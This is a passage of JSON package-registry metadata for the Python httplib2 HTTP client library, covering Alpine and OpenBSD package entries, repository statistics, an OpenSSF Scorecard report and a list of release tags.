b2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T12:54:59.076Z","dependent_packages_count":5,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":3.220246023662148,"stargazers_count":6.526678680560996,"forks_count":4.583561858497219,"average":3.582621640680091},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":163,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-20T00:01:57.813Z","updated_at":"2023-02-20T00:01:57.813Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.12","url":"https://pkgs.alpinelinux.org/packages?branch=v3.12","ecosystem":"alpine","default":false,"packages_count":12763,"maintainers_count":216,"namespaces_count":2,"keywords_count":1442,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":489},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.748Z","updated_at":"2026-08-23T05:04:29.893Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/namespaces"}},{"id":14552286,"name":"www/py-httplib2","ecosystem":"openbsd","description":"Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"www","versions_count":1,"first_release_published_at":"2026-04-25T13:29:19.000Z","latest_release_published_at":"2026-04-25T13:29:19.000Z","latest_release_number":"0.31.2","last_synced_at":"2026-05-28T02:06:03.889Z","created_at":"2026-05-28T02:06:03.634Z","updated_at":"2026-08-21T12:54:59.084Z","registry_url":"https://cvsweb.openbsd.org/cgi-bin/cvsweb/ports/www/py-httplib2/","install_command":"pkg_add py3-httplib2-0.31.2","documentation_url":null,"metadata":{"pkgstem":"py3-httplib2","fullpkgname":"py3-httplib2-0.31.2","subpackage":"-"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.e